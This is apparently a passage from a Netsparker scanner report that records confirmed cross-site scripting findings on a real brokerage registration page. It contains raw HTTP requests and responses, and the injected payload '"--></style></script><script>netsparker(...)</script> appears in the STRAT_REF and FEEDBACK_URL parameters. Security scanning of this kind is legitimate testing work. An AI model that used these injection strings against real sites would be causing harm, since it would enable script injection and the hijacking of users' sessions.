      &lt;table border=&quot;0&quot; cellpadding=&quot;1&quot; cellspacing=&quot;0&quot; style=&quot;table-layout:auto;&quot;&gt;
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;&quot; style=display:none checked&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;6&quot; id=&quot;radio_accountKind_6&quot;  onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_6&quot;&gt;Retail Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;7&quot; id=&quot;radio_accountKind_7&quot;   onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_7&quot;&gt;Standard Account (from 50 000 USD)&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;100&quot; id=&quot;radio_accountKind_100&quot;  onClick=&quot;fSetServProviderMode(false);fSetManagedAccountStrategyMode(true);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_100&quot;&gt;Managed Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_managedAccountStrategy&quot; style=&quot;display:none;&quot; disabled&gt;
			          
            &lt;b&gt;Whilst selecting your Manager/Attorney and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Manager/Attorney and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Manager/Attorney&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[managedAccountStrategy]&quot; id=&quot;sel_mas&quot;&gt;
		      &lt;option value=&apos;1ABEM3&apos; &gt;&amp;nbsp;1ABEM3&lt;/option&gt;
&lt;option value=&apos;356JFH1&apos; &gt;&amp;nbsp;356JFH1&lt;/option&gt;
&lt;option value=&apos;356JFH2&apos; &gt;&amp;nbsp;356JFH2&lt;/option&gt;
&lt;option value=&apos;356JFH3&apos; &gt;&amp;nbsp;356JFH3&lt;/option&gt;
&lt;option value=&apos;356JFH4&apos; &gt;&amp;nbsp;356JFH4&lt;/option&gt;
&lt;option value=&apos;356JFH5&apos; &gt;&amp;nbsp;356JFH5&lt;/option&gt;
&lt;option value=&apos;3SFX1&apos; &gt;&amp;nbsp;3SFX1&lt;/option&gt;
&lt;option value=&apos;3SFX2&apos; &gt;&amp;nbsp;3SFX2&lt;/option&gt;
&lt;option value=&apos;45GHKLBV&apos; &gt;&amp;nbsp;45GHKLBV&lt;/option&gt;
&lt;option value=&apos;AADB88&apos; &gt;&amp;nbsp;AADB88&lt;/option&gt;
&lt;option value=&apos;ABBB22&apos; &gt;&amp;nbsp;ABBB22&lt;/option&gt;
&lt;option value=&apos;ABEF73&apos; &gt;&amp;nbsp;ABEF73&lt;/option&gt;
&lt;option value=&apos;AEAC86&apos; &gt;&amp;nbsp;AEAC86&lt;/option&gt;
&lt;option value=&apos;AECC31&apos; &gt;&amp;nbsp;AECC31&lt;/option&gt;
&lt;option value=&apos;ALPX&apos; &gt;&amp;nbsp;ALPX&lt;/option&gt;
&lt;option value=&apos;ALTV&apos; &gt;&amp;nbsp;ALTV&lt;/option&gt;
&lt;option value=&apos;ARCH&apos; &gt;&amp;nbsp;ARCH&lt;/option&gt;
&lt;option value=&apos;ARXX&apos; &gt;&amp;nbsp;ARXX&lt;/option&gt;
&lt;option value=&apos;AZAT681&apos; &gt;&amp;nbsp;AZAT681&lt;/option&gt;
&lt;option value=&apos;Augustan&apos; &gt;&amp;nbsp;Augustan&lt;/option&gt;
&lt;option value=&apos;BABC92&apos; &gt;&amp;nbsp;BABC92&lt;/option&gt;
&lt;option value=&apos;BADF84&apos; &gt;&amp;nbsp;BADF84&lt;/option&gt;
&lt;option value=&apos;BAYWM&apos; &gt;&amp;nbsp;BAYWM&lt;/option&gt;
&lt;option value=&apos;BCAD67&apos; &gt;&amp;nbsp;BCAD67&lt;/option&gt;
&lt;option value=&apos;BCBC72&apos; &gt;&amp;nbsp;BCBC72&lt;/option&gt;
&lt;option value=&apos;BCCA82&apos; &gt;&amp;nbsp;BCCA82&lt;/option&gt;
&lt;option value=&apos;BCEE55&apos; &gt;&amp;nbsp;BCEE55&lt;/option&gt;
&lt;option value=&apos;BDAD35&apos; &gt;&amp;nbsp;BDAD35&lt;/option&gt;
&lt;option value=&apos;BDCC70&apos; &gt;&amp;nbsp;BDCC70&lt;/option&gt;
&lt;option value=&apos;BDCP&apos; &gt;&amp;nbsp;BDCP&lt;/option&gt;
&lt;option value=&apos;BEAD70&apos; &gt;&amp;nbsp;BEAD70&lt;/option&gt;
&lt;option value=&apos;BEAF55&apos; &gt;&amp;nbsp;BEAF55&lt;/option&gt;
&lt;option value=&apos;BECF19&apos; &gt;&amp;nbsp;BECF19&lt;/option&gt;
&lt;option value=&apos;BEDD59&apos; &gt;&amp;nbsp;BEDD59&lt;/option&gt;
&lt;option value=&apos;BEEE43&apos; &gt;&amp;nbsp;BEEE43&lt;/option&gt;
&lt;option value=&apos;BRKIC&apos; &gt;&amp;nbsp;BRKIC&lt;/option&gt;
&lt;option value=&apos;BUSH&apos; &gt;&amp;nbsp;BUSH&lt;/option&gt;
&lt;option value=&apos;BUSH288&apos; &gt;&amp;nbsp;BUSH288&lt;/option&gt;
&lt;option value=&apos;CBFB47&apos; &gt;&amp;nbsp;CBFB47&lt;/option&gt;
&lt;option value=&apos;CCDE32&apos; &gt;&amp;nbsp;CCDE32&lt;/option&gt;
&lt;option value=&apos;CCPFX&apos; &gt;&amp;nbsp;CCPFX&lt;/option&gt;
&lt;option value=&apos;CDCD88&apos; &gt;&amp;nbsp;CDCD88&lt;/option&gt;
&lt;option value=&apos;CDFD34&apos; &gt;&amp;nbsp;CDFD34&lt;/option&gt;
&lt;option value=&apos;CEDD62&apos; &gt;&amp;nbsp;CEDD62&lt;/option&gt;
&lt;option value=&apos;CEFA67&apos; &gt;&amp;nbsp;CEFA67&lt;/option&gt;
&lt;option value=&apos;CEFF58&apos; &gt;&amp;nbsp;CEFF58&lt;/option&gt;
&lt;option value=&apos;CFEC46&apos; &gt;&amp;nbsp;CFEC46&lt;/option&gt;
&lt;option value=&apos;CFFX&apos; &gt;&amp;nbsp;CFFX&lt;/option&gt;
&lt;option value=&apos;CGFX&apos; &gt;&amp;nbsp;CGFX&lt;/option&gt;
&lt;option value=&apos;CHBC&apos; &gt;&amp;nbsp;CHBC&lt;/option&gt;
&lt;option value=&apos;CLMFX&apos; &gt;&amp;nbsp;CLMFX&lt;/option&gt;
&lt;option value=&apos;CurrClub&apos; &gt;&amp;nbsp;CurrClub&lt;/option&gt;
&lt;option value=&apos;DADD65&apos; &gt;&amp;nbsp;DADD65&lt;/option&gt;
&lt;option value=&apos;DBAA26&apos; &gt;&amp;nbsp;DBAA26&lt;/option&gt;
&lt;option value=&apos;DBAF77&apos; &gt;&amp;nbsp;DBAF77&lt;/option&gt;
&lt;option value=&apos;DBFB93&apos; &gt;&amp;nbsp;DBFB93&lt;/option&gt;
&lt;option value=&apos;DCCD84&apos; &gt;&amp;nbsp;DCCD84&lt;/option&gt;
&lt;option value=&apos;DCEC93&apos; &gt;&amp;nbsp;DCEC93&lt;/option&gt;
&lt;option value=&apos;DDBF26&apos; &gt;&amp;nbsp;DDBF26&lt;/option&gt;
&lt;option value=&apos;DDCC49&apos; &gt;&amp;nbsp;DDCC49&lt;/option&gt;
&lt;option value=&apos;DDDB32&apos; &gt;&amp;nbsp;DDDB32&lt;/option&gt;
&lt;option value=&apos;DEFD33&apos; &gt;&amp;nbsp;DEFD33&lt;/option&gt;
&lt;option value=&apos;DF56NB&apos; &gt;&amp;nbsp;DF56NB&lt;/option&gt;
&lt;option value=&apos;DF794J0&apos; &gt;&amp;nbsp;DF794J0&lt;/option&gt;
&lt;option value=&apos;DFAF50&apos; &gt;&amp;nbsp;DFAF50&lt;/option&gt;
&lt;option value=&apos;DG785&apos; &gt;&amp;nbsp;DG785&lt;/option&gt;
&lt;option value=&apos;DOXX&apos; &gt;&amp;nbsp;DOXX&lt;/option&gt;
&lt;option value=&apos;DRFX1&apos; &gt;&amp;nbsp;DRFX1&lt;/option&gt;
&lt;option value=&apos;DSBP&apos; &gt;&amp;nbsp;DSBP&lt;/option&gt;
&lt;option value=&apos;EACE93&apos; &gt;&amp;nbsp;EACE93&lt;/option&gt;
&lt;option value=&apos;EADA74&apos; &gt;&amp;nbsp;EADA74&lt;/option&gt;
&lt;option value=&apos;EAEE21&apos; &gt;&amp;nbsp;EAEE21&lt;/option&gt;
&lt;option value=&apos;EAFD36&apos; &gt;&amp;nbsp;EAFD36&lt;/option&gt;
&lt;option value=&apos;EBAD44&apos; &gt;&amp;nbsp;EBAD44&lt;/option&gt;
&lt;option value=&apos;EBBB34&apos; &gt;&amp;nbsp;EBBB34&lt;/option&gt;
&lt;option value=&apos;EBDE90&apos; &gt;&amp;nbsp;EBDE90&lt;/option&gt;
&lt;option value=&apos;ECURRENTZ&apos; &gt;&amp;nbsp;ECURRENTZ&lt;/option&gt;
&lt;option value=&apos;EDCC46&apos; &gt;&amp;nbsp;EDCC46&lt;/option&gt;
&lt;option value=&apos;EFAF70&apos; &gt;&amp;nbsp;EFAF70&lt;/option&gt;
&lt;option value=&apos;EFBB17&apos; &gt;&amp;nbsp;EFBB17&lt;/option&gt;
&lt;option value=&apos;EFCA50&apos; &gt;&amp;nbsp;EFCA50&lt;/option&gt;
&lt;option value=&apos;EFCA92&apos; &gt;&amp;nbsp;EFCA92&lt;/option&gt;
&lt;option value=&apos;FAAC62&apos; &gt;&amp;nbsp;FAAC62&lt;/option&gt;
&lt;option value=&apos;FBDB80&apos; &gt;&amp;nbsp;FBDB80&lt;/option&gt;
&lt;option value=&apos;FBDF30&apos; &gt;&amp;nbsp;FBDF30&lt;/option&gt;
&lt;option value=&apos;FBED79&apos; &gt;&amp;nbsp;FBED79&lt;/option&gt;
&lt;option value=&apos;FBFA65&apos; &gt;&amp;nbsp;FBFA65&lt;/option&gt;
&lt;option value=&apos;FCCA80&apos; &gt;&amp;nbsp;FCCA80&lt;/option&gt;
&lt;option value=&apos;FDAG&apos; &gt;&amp;nbsp;FDAG&lt;/option&gt;
&lt;option value=&apos;FEEC47&apos; &gt;&amp;nbsp;FEEC47&lt;/option&gt;
&lt;option value=&apos;FFFF98&apos; &gt;&amp;nbsp;FFFF98&lt;/option&gt;
&lt;option value=&apos;FGB1WFM&apos; &gt;&amp;nbsp;FGB1WFM&lt;/option&gt;
&lt;option value=&apos;FGH7GB&apos; &gt;&amp;nbsp;FGH7GB&lt;/option&gt;
&lt;option value=&apos;FGH90IK&apos; &gt;&amp;nbsp;FGH90IK&lt;/option&gt;
&lt;option value=&apos;FIBX1&apos; &gt;&amp;nbsp;FIBX1&lt;/option&gt;
&lt;option value=&apos;FORMA&apos; &gt;&amp;nbsp;FORMA&lt;/option&gt;
&lt;option value=&apos;FORT&apos; &gt;&amp;nbsp;FORT&lt;/option&gt;
&lt;option value=&apos;FRAPX&apos; &gt;&amp;nbsp;FRAPX&lt;/option&gt;
&lt;option value=&apos;FTAM&apos; &gt;&amp;nbsp;FTAM&lt;/option&gt;
&lt;option value=&apos;FXDASH1A&apos; &gt;&amp;nbsp;FXDASH1A&lt;/option&gt;
&lt;option value=&apos;FXG1&apos; &gt;&amp;nbsp;FXG1&lt;/option&gt;
&lt;option value=&apos;FXMN&apos; &gt;&amp;nbsp;FXMN&lt;/option&gt;
&lt;option value=&apos;FXPOR&apos; &gt;&amp;nbsp;FXPOR&lt;/option&gt;
&lt;option value=&apos;FXRGC&apos; &gt;&amp;nbsp;FXRGC&lt;/option&gt;
&lt;option value=&apos;G7NV&apos; &gt;&amp;nbsp;G7NV&lt;/option&gt;
&lt;option value=&apos;GHJKL76&apos; &gt;&amp;nbsp;GHJKL76&lt;/option&gt;
&lt;option value=&apos;GLCM&apos; &gt;&amp;nbsp;GLCM&lt;/option&gt;
&lt;option value=&apos;GSYE&apos; &gt;&amp;nbsp;GSYE&lt;/option&gt;
&lt;option value=&apos;GTG67H&apos; &gt;&amp;nbsp;GTG67H&lt;/option&gt;
&lt;option value=&apos;GTXX&apos; &gt;&amp;nbsp;GTXX&lt;/option&gt;
&lt;option value=&apos;HJH768&apos; &gt;&amp;nbsp;HJH768&lt;/option&gt;
&lt;option value=&apos;HKJBXF&apos; &gt;&amp;nbsp;HKJBXF&lt;/option&gt;
&lt;option value=&apos;HRAPX&apos; &gt;&amp;nbsp;HRAPX&lt;/option&gt;
&lt;option value=&apos;HUSK&apos; &gt;&amp;nbsp;HUSK&lt;/option&gt;
&lt;option value=&apos;IDTX&apos; &gt;&amp;nbsp;IDTX&lt;/option&gt;
&lt;option value=&apos;IDTX1&apos; &gt;&amp;nbsp;IDTX1&lt;/option&gt;
&lt;option value=&apos;IDTX2&apos; &gt;&amp;nbsp;IDTX2&lt;/option&gt;
&lt;option value=&apos;IDTX3&apos; &gt;&amp;nbsp;IDTX3&lt;/option&gt;
&lt;option value=&apos;INHH&apos; &gt;&amp;nbsp;INHH&lt;/option&gt;
&lt;option value=&apos;ITASCA&apos; &gt;&amp;nbsp;ITASCA&lt;/option&gt;
&lt;option value=&apos;JDCFX&apos; &gt;&amp;nbsp;JDCFX&lt;/option&gt;
&lt;option value=&apos;JLS&apos; &gt;&amp;nbsp;JLS&lt;/option&gt;
&lt;option value=&apos;JSDM&apos; &gt;&amp;nbsp;JSDM&lt;/option&gt;
&lt;option value=&apos;KRCM1&apos; &gt;&amp;nbsp;KRCM1&lt;/option&gt;
&lt;option value=&apos;KRCM2&apos; &gt;&amp;nbsp;KRCM2&lt;/option&gt;
&lt;option value=&apos;LBMFX&apos; &gt;&amp;nbsp;LBMFX&lt;/option&gt;
&lt;option value=&apos;LBXX2&apos; &gt;&amp;nbsp;LBXX2&lt;/option&gt;
&lt;option value=&apos;LMXX&apos; &gt;&amp;nbsp;LMXX&lt;/option&gt;
&lt;option value=&apos;LivIn&apos; &gt;&amp;nbsp;LivIn&lt;/option&gt;
&lt;option value=&apos;MASI&apos; &gt;&amp;nbsp;MASI&lt;/option&gt;
&lt;option value=&apos;MBCM&apos; &gt;&amp;nbsp;MBCM&lt;/option&gt;
&lt;option value=&apos;MBCO&apos; &gt;&amp;nbsp;MBCO&lt;/option&gt;
&lt;option value=&apos;MDLV&apos; &gt;&amp;nbsp;MDLV&lt;/option&gt;
&lt;option value=&apos;MEIDAO&apos; &gt;&amp;nbsp;MEIDAO&lt;/option&gt;
&lt;option value=&apos;NK71&apos; &gt;&amp;nbsp;NK71&lt;/option&gt;
&lt;option value=&apos;NKHFX&apos; &gt;&amp;nbsp;NKHFX&lt;/option&gt;
&lt;option value=&apos;OANFx5&apos; &gt;&amp;nbsp;OANFx5&lt;/option&gt;
&lt;option value=&apos;OANFx55&apos; &gt;&amp;nbsp;OANFx55&lt;/option&gt;
&lt;option value=&apos;OGFX&apos; &gt;&amp;nbsp;OGFX&lt;/option&gt;
&lt;option value=&apos;PAXX&apos; &gt;&amp;nbsp;PAXX&lt;/option&gt;
&lt;option value=&apos;PORFX&apos; &gt;&amp;nbsp;PORFX&lt;/option&gt;
&lt;option value=&apos;PRSP&apos; &gt;&amp;nbsp;PRSP&lt;/option&gt;
&lt;option value=&apos;PURK1&apos; &gt;&amp;nbsp;PURK1&lt;/option&gt;
&lt;option value=&apos;RGCSR&apos; &gt;&amp;nbsp;RGCSR&lt;/option&gt;
&lt;option value=&apos;RJPFX&apos; &gt;&amp;nbsp;RJPFX&lt;/option&gt;
&lt;option value=&apos;RMJ&apos; &gt;&amp;nbsp;RMJ&lt;/option&gt;
&lt;option value=&apos;RNKFX&apos; &gt;&amp;nbsp;RNKFX&lt;/option&gt;
&lt;option value=&apos;ROXX&apos; &gt;&amp;nbsp;ROXX&lt;/option&gt;
&lt;option value=&apos;RSFX&apos; &gt;&amp;nbsp;RSFX&lt;/option&gt;
&lt;option value=&apos;RUSLION&apos; &gt;&amp;nbsp;RUSLION&lt;/option&gt;
&lt;option value=&apos;Rio2016&apos; &gt;&amp;nbsp;Rio2016&lt;/option&gt;
&lt;option value=&apos;SARK&apos; &gt;&amp;nbsp;SARK&lt;/option&gt;
&lt;option value=&apos;SEP1&apos; &gt;&amp;nbsp;SEP1&lt;/option&gt;
&lt;option value=&apos;SKUSN&apos; &gt;&amp;nbsp;SKUSN&lt;/option&gt;
&lt;option value=&apos;SMXX&apos; &gt;&amp;nbsp;SMXX&lt;/option&gt;
&lt;option value=&apos;SOUK&apos; &gt;&amp;nbsp;SOUK&lt;/option&gt;
&lt;option value=&apos;SRVFX&apos; &gt;&amp;nbsp;SRVFX&lt;/option&gt;
&lt;option value=&apos;STAC&apos; &gt;&amp;nbsp;STAC&lt;/option&gt;
&lt;option value=&apos;STAR+&apos; &gt;&amp;nbsp;STAR+&lt;/option&gt;
&lt;option value=&apos;SVTL&apos; &gt;&amp;nbsp;SVTL&lt;/option&gt;
&lt;option value=&apos;TC4ET&apos; &gt;&amp;nbsp;TC4ET&lt;/option&gt;
&lt;option value=&apos;TFGINC&apos; &gt;&amp;nbsp;TFGINC&lt;/option&gt;
&lt;option value=&apos;VASCON1&apos; &gt;&amp;nbsp;VASCON1&lt;/option&gt;
&lt;option value=&apos;VASCON2&apos; &gt;&amp;nbsp;VASCON2&lt;/option&gt;
&lt;option value=&apos;VASCON3&apos; &gt;&amp;nbsp;VASCON3&lt;/option&gt;
&lt;option value=&apos;VFGL5112&apos; &gt;&amp;nbsp;VFGL5112&lt;/option&gt;
&lt;option value=&apos;VHGLNM678&apos; &gt;&amp;nbsp;VHGLNM678&lt;/option&gt;
&lt;option value=&apos;VKCS52&apos; &gt;&amp;nbsp;VKCS52&lt;/option&gt;
&lt;option value=&apos;VNG409CG&apos; &gt;&amp;nbsp;VNG409CG&lt;/option&gt;
&lt;option value=&apos;Vulov10&apos; &gt;&amp;nbsp;Vulov10&lt;/option&gt;
&lt;option value=&apos;W2WFX&apos; &gt;&amp;nbsp;W2WFX&lt;/option&gt;
&lt;option value=&apos;WDFX&apos; &gt;&amp;nbsp;WDFX&lt;/option&gt;
&lt;option value=&apos;WDFX2&apos; &gt;&amp;nbsp;WDFX2&lt;/option&gt;
&lt;option value=&apos;WDXX&apos; &gt;&amp;nbsp;WDXX&lt;/option&gt;
&lt;option value=&apos;XYWFX&apos; &gt;&amp;nbsp;XYWFX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[extManAnswer]&quot; value=&quot;Yes&quot; id=extManContact0&gt;&lt;label for=extManContact0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the External Manager is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the External Manager and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my External Manager&amp;#039;s acts or omissions.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;&lt;br&gt;
          &lt;/td&gt;
        &lt;/tr&gt;

        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;200&quot; id=&quot;radio_accountKind_200&quot; checked onClick=&quot;fSetServProviderMode(true);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_200&quot;&gt;Service Provider&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_servProvider&quot; &gt;
			          
            &lt;b&gt;Whilst selecting your Service Provider and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Service Provider and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Service Provider&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[serviceProvider]&quot; id=&quot;sel_mas2&quot;&gt;
		      &lt;option value=&apos;BBAC47&apos; &gt;&amp;nbsp;BBAC47&lt;/option&gt;
&lt;option value=&apos;BUSH1&apos; &gt;&amp;nbsp;BUSH1&lt;/option&gt;
&lt;option value=&apos;BUSH2&apos; &gt;&amp;nbsp;BUSH2&lt;/option&gt;
&lt;option value=&apos;GNM87FV&apos; &gt;&amp;nbsp;GNM87FV&lt;/option&gt;
&lt;option value=&apos;KRC1&apos; &gt;&amp;nbsp;KRC1&lt;/option&gt;
&lt;option value=&apos;KRC2&apos; &gt;&amp;nbsp;KRC2&lt;/option&gt;
&lt;option value=&apos;KRC3&apos; &gt;&amp;nbsp;KRC3&lt;/option&gt;
&lt;option value=&apos;TINL&apos; &gt;&amp;nbsp;TINL&lt;/option&gt;
&lt;option value=&apos;ZUXX&apos; &gt;&amp;nbsp;ZUXX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[servProviderAnswer]&quot; value=&quot;Yes&quot; id=servProvider0&gt;&lt;label for=servProvider0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the Service Provider is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the Service Provider and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my Service Provider&amp;#039;s acts or omissions. I hereby acknowledge and agree that Dukascopy Bank SA may communicate my UIN and e-mail address to the Service Provider.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;				
          &lt;/td&gt;
        &lt;/tr&gt;

      &lt;/table&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
     &lt;td colspan=&quot;2&quot; align=&quot;center&quot;&gt;
     &lt;div id=&quot;infoWTXX&quot;&gt;        
      &lt;/div&gt;
      &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;buttons&quot;&gt;
      &lt;input class=&quot;button&quot; type=&quot;submit&quot; name=&quot;next&quot; value=&quot;Submit&quot;&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;info&quot; style=&quot;padding:20 0 0 0;&quot;&gt;
  MINIMUM AMOUNT TO BE DEPOSITED&lt;br/&gt;TO OPEN A LIVE TRADING ACCOUNT IS 1 000 USD&lt;br/&gt;
(OR ITS EQUIVALENT IN OTHER CURRENCIES).&lt;br/&gt;
&lt;br/&gt;&lt;b&gt;Filling the application form, please use Latin letters only!&lt;/b&gt;&lt;br/&gt;
&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;
	&lt;/td&gt;
  &lt;/tr&gt;
&lt;input type=&quot;hidden&quot; name=&quot;aData[HTTP_REFERER]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;backFormMarker&quot; value=&quot;&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;currentFormMarker&quot; value=&quot;step1&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;nextFormMarker&quot; value=&quot;step2&quot;&gt;&lt;span style=display:none; id=hidHtmlConvert&gt;&lt;/span&gt;&lt;script&gt;
                function fFillFormField (oElement, value)    {
                    try {
                        switch(oElement.tagName) {
                            case &quot;TEXTAREA&quot;:
                            case &quot;TEXT&quot;:
                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
								// oElement.value = value;
                            break;
                            case &quot;SELECT&quot;:
                                oElement.value = value;
                                bFound = false;
                                for (i=0; i&lt;oElement.options.length; i++)    {
                                    if(oElement.options[i].value == value)    {
                                        oElement.options[i].selected = true;
                                        bFound = true;
                                        break;
                                    }
                                }
                                if(value &amp;&amp; !bFound)    {
                                    oNew = document.createElement(&quot;OPTION&quot;);
                                    oNew.value = value;
                                    oNew.innerHTML = value;
                                    oElement.appendChild(oNew);
                                    oElement.lastChild.selected = true;
                                }
                            break;
                            default:
                                if(oElement.length)    {
                                    for(i=0;i&lt;oElement.length;i++)    {
                                        if(oElement[i].value == value)
                                            oElement[i].click();
                                        else
                                            oElement[i].checked = false;
                                    }
                                }
                                else {
                                    if(oElement.type == &quot;checkbox&quot;)
                                        oElement.click();
                                    else {
		                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
		                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
                                    //  oElement.value = value;
                                        }
                                }
                            break;
                        }
                        try    {
                            oElement.fireEvent(&quot;onchange&quot;);
                        }
                        catch(e) {
                            try {
                                var evt = document.createEvent(&quot;HTMLEvents&quot;);
                                evt.initEvent(&quot;change&quot;,true,true);
                                oElement.dispatchEvent( evt );
                            }
                            catch(e){}
                        }
                    }
                    catch(e){}
                }
                function fFillForm()    {
fFillFormField(document.mainForm[&quot;aData[STRAT_REF]&quot;], &quot;\&apos;\&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000111)&lt;/script&gt;&quot;);
fFillFormField(document.mainForm[&quot;aData[FEEDBACK_URL]&quot;], &quot;-1&quot;);
fFillFormField(document.mainForm[&quot;aData[TYPE]&quot;], &quot;2&quot;);
fFillFormField(document.mainForm[&quot;aData[accountKind]&quot;], &quot;200&quot;);
fFillFormField(document.mainForm[&quot;aData[servProviderAnswer]&quot;], &quot;Yes&quot;);}&lt;/script&gt;&lt;/form&gt;
&lt;/table&gt;
&lt;img id=&quot;progress_img&quot; src=&quot;../../images/progress_bar.gif&quot; width=&quot;69&quot; height=&quot;17&quot; border=&quot;0&quot; style=&quot;display:none;&quot;&gt;
  &lt;/body&gt;
&lt;/html&gt;
 ]]></rawresponse>

		<extrainformation>
		</extrainformation>


        <classification>
            <OWASP>A2</OWASP>
            <WASC>08</WASC>
            <CWE>79</CWE>
            <CAPEC>19</CAPEC>
        </classification>
				
	</vulnerability>

	<vulnerability confirmed="True">
		<url>https://live-login.dukascopy.com/fo/register/live/index.php</url>
		<type>XSS</type>
		<severity>Important</severity>
		
		<vulnerableparametertype>Post</vulnerableparametertype>
		<vulnerableparameter>aData%5BFEEDBACK_URL%5D</vulnerableparameter>
		<vulnerableparametervalue>&apos;&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x00012F)&lt;/script&gt;</vulnerableparametervalue>

		<rawrequest><![CDATA[POST /fo/register/live/index.php HTTP/1.1
Referer: https://live-login.dukascopy.com/fo/register/live/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: live-login.dukascopy.com
Content-Length: 264
Accept-Encoding: gzip, deflate

aData%5BSTRAT_REF%5D=-1&amp;aData%5BFEEDBACK_URL%5D=&apos;%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00012F)%3c%2fscript%3e&amp;aData%5BTYPE%5D=1&amp;aData%5BaccountKind%5D=3&amp;aData%5BHTTP_REFERER%5D=3&amp;backFormMarker=3&amp;currentFormMarker=step1&amp;nextFormMarker=step2
 ]]></rawrequest>
		<rawresponse><![CDATA[HTTP/1.1 200 OK
Date: Thu, 17 Mar 2011 19:25:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.3
Transfer-Encoding: chunked
Content-Type: text/html; charset=windows-1252



&lt;html lang=&quot;en&quot;&gt;
  &lt;head&gt;
    &lt;title&gt;Client Registration&lt;/title&gt;
    &lt;META http-equiv=Content-Type content=&quot;text/html; charset=windows-1252&quot;&gt;
    &lt;script&gt;
      function init()  {
        fFillForm();
      }

      var bShowWaiting = true;

      function showWaiting()  {
        if(bShowWaiting)  {
          for (odj in document.body.childNodes)
            try  {
	            document.body.childNodes[odj].style.display = &apos;none&apos;;
	          }catch(e){}

	        oProgressDiv = document.createElement(&apos;div&apos;);
	        document.body.appendChild(oProgressDiv);
	        oProgressDiv.align = &apos;center&apos;;
	        oProgressDiv.innerHTML = &quot;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;Please, wait&lt;br/&gt;&quot;;

	        tmp = document.getElementById(&apos;progress_img&apos;)
	        oProgressImg = tmp.cloneNode(false);
	        oProgressImg.style.display = &apos;block&apos;;
	        oProgressDiv.appendChild(oProgressImg);
	        bShowWaiting = false;
	      }
      }

    function addEventHandler(obj, type, func, useCapture) {
        if (obj.addEventListener) {
            obj.addEventListener(type, func, useCapture);
            return true;
        }
        else if (obj.attachEvent) {
            var r = obj.attachEvent(&apos;on&apos; + type, func);
            return r;
    	}
        else {
            obj[&apos;on&apos; + type] = func;
        }
    }

    tipIndex = 0;
    function drawTip (sTip, width) {
        this.hideDelay = 600;
